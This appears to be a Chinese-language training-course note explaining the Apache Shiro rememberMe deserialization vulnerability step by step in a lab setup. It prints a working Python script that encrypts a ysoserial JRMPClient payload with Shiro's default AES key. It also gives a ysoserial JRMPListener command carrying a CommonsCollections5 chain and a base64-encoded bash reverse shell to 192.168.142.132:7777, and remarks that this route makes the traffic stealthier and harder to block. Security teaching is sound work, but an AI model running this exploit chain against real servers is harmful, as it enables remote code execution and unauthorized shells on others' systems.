Shiro反序列化漏洞原理解释

关联问题：
为什么我发送一个cookie也就是正确的rememe字段他就会来反弹连接我的jrmp的服务器
https://www.mashibing.com/question/detail/98722

是不是经过了两次反序列化
https://www.mashibing.com/question/detail/98059

课程：
《4-利用方式和工具》

# 登录验证机制

![](/media/202404/2024-04-27_215112_4644610.7908457013678454.png)

# 利用流程

![](/media/202404/2024-04-27_201635_9492790.28938819460471776.png)

我们反过来看漏洞攻击是怎么发生的：
# 环境

192.168.142.132:8888 JRMPListner端口
192.168.142.132:7777 反弹连接端口

# 第四步：把序列化以后的payload发送给漏洞服务器

```
rememberMe=+DcRVRC3TxGKeuGHa4TZSWqqLtQGyPvE0mjicSb4nm6nUdC6PwNxo6ZgbQLuHr8wq3ECYQVLqKXaECtmKQhW91hbrn3XgJzn3XRUgNEciP3dQpQcOO1ID+vsns3qmyd6SMva5e+cX7z74AwVAK2i0cwc/AmnVUV/oCdA9nHPcb6b5EH23bkrLuafb5Ij7e6t+X1pZunOUFbquQqrBCW4D+hmUS+g93brv5cpLDmR5DWkh7yqWyTXMWKzZqRP0iW/x1gOFVZ3wPv2CYZhvQlH3jpk7nxq5gf5rfCgQ7T8R7OJ66zQc92gx0kbInRJ/QT3v19RF3Jn/q7fBGyX2/LDDdjPzd4DYBMj3CgH3Cx4FuElMv4364VTknFZqVj4gMsfGS2OA9NZ/2jVIFhTdhvU3w==
```

![](/media/202509/2025-09-12_212947_3123100.46662714037241637.png)

问题：这个payload里面包含了什么呢？服务器反序列化这段内容的时候会发生什么事情？

# 第三步：填入IP端口，生成一段连接JRMPListner的序列化内容
以上的payload是用如下命令生成的：
```
python3 shiro.py 192.168.142.132:8888
```

`192.168.142.132:8888` 就是Kali的JRMPListner的地址。

![](/media/202509/2025-09-12_213106_8238810.5886293902212093.png)

我们来研究下shiro.py的内容：
```
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
    # 打开JRMP客户端，连接到特定端口，获取yso已经【序列化】的内容
    # 这里已经序列化内容就是去 连接指定的JRMPListner服务器
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    # 用获取到的key  【AES加密】
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    # 生成随机16位长度的IV
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    # 【base64编码】
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])   
print("rememberMe={0}".format(payload.decode()))
```

由代码的注释可以清楚地看到，当这段代码被【bsse64解码——解密——反序列化】出来执行的时候，会做以下事情：
 连接指定的JRMPListner服务器
这个就是我们填写的：192.168.142.132:8888

问题：为什么最终连接到192.168.142.132:7777 ，会执行反弹连接代码？

# 第二步：使用ysoserial.jar工具包在Kali服务器启动了一个JRMPListner
监听本机的8888端口

命令：
```
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"
```

作用：
ysoserial工具会把末尾双引号""里面的恶意命令（此处是反弹连接的命令）进行序列化。

答案揭晓：`漏洞服务器`连接到ysoserial程序监听的JRMPListner（8888端口）的时候，ysoserial程序给漏洞服务发送了经过序列化的恶意命令

# 第一步：把反弹连接的命令，用base64编码工具进行编码
工具网页：
https://wiki.bafangwy.com/doc/401/

原命令：
`bash -i >& /dev/tcp/192.168.142.132/7777 0>&1`
编码以后：
` bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}`

这个命令会交由ysoserial进行序列化。

# 详细流程
![](/media/202404/2024-04-27_200501_8029020.6061135806433284.png)

# 其他问题：
## 1、shiro漏洞利用的前提是什么？
1）属于有漏洞的版本
2）key可以被暴破（否则无法解密）

## 2、Apache Shiro和Apache Commons Collections的关系是什么？
Shiro存在反序列化漏洞的时候，仅仅能做到反序列化任意类，但是并不能构成在反序列化的时候自动执行任意代码。
所以要借助于Apache Shiro依赖里面包含的Apache Commons Collections。

## 3、为什么要用ysoserial发起利用，直接给漏洞服务器发反弹连接payload，不用ysoserial可以吗？
不用也可以。
使用ysoserial的优势：是漏洞服务器主动连接攻击机器，流量更隐蔽，防止被识别、拦截。

关联知识点：
Apache Commons Collections调用链路
https://wiki.bafangwy.com/doc/578/